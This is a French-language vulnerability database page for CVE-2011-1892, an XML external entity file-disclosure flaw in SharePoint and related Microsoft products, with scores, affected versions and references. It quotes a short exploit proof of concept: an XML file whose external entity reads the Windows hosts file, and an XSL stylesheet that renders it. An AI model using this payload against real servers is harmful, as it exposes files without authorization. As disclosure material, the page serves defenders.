CVE-2011-1892 : Détail

CVE-2011-1892

A01-Broken Access Control
16.33%V3
Network
2011-09-15
08h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4 AV:N/AC:L/Au:S/C:P/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 17873

Date de publication : 2011-09-19 22h00 +00:00
Auteur : Nicolas Gregoire
EDB Vérifié : No

Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke Date: September 15, 2011 Author: Nicolas Gregoire Version: SharePoint 2007 / 2010, DotNetNuke < 6 CVE : CVE-2011-1892 poc filename: xee.xml <!DOCTYPE doc [ <!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts"> ]> <doc>&boom;</doc> poc filename: xee.xsl <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:apply-templates/> <xsl:value-of select="doc"/> </xsl:template> </xsl:stylesheet>

Products Mentioned

Configuraton 0

Microsoft>>Forms_server >> Version 2007

    Microsoft>>Forms_server >> Version 2007

      Microsoft>>Groove >> Version 2007

        Microsoft>>Groove_data_bridge_server >> Version 2007

          Microsoft>>Groove_management_server >> Version 2007

            Microsoft>>Groove_server >> Version 2010

            Microsoft>>Groove_server >> Version 2010

            Microsoft>>Office_web_apps >> Version 2010

            Microsoft>>Office_web_apps >> Version 2010

            Microsoft>>Sharepoint_foundation >> Version 2010

            Microsoft>>Sharepoint_server >> Version 2007

              Microsoft>>Sharepoint_server >> Version 2007

                Microsoft>>Sharepoint_server >> Version 2010

                Microsoft>>Sharepoint_server >> Version 2010

                Microsoft>>Sharepoint_services >> Version 3.0

                  Microsoft>>Sharepoint_services >> Version 3.0

                    Microsoft>>Sharepoint_workspace >> Version 2010

                      Microsoft>>Sharepoint_workspace >> Version 2010

                        Microsoft>>Sharepoint_workspace >> Version 2010

                          Microsoft>>Sharepoint_workspace >> Version 2010

                            Références

                            http://securityreason.com/securityalert/8386
                            Tags : third-party-advisory, x_refsource_SREASON
                            http://www.us-cert.gov/cas/techalerts/TA11-256A.html
                            Tags : third-party-advisory, x_refsource_CERT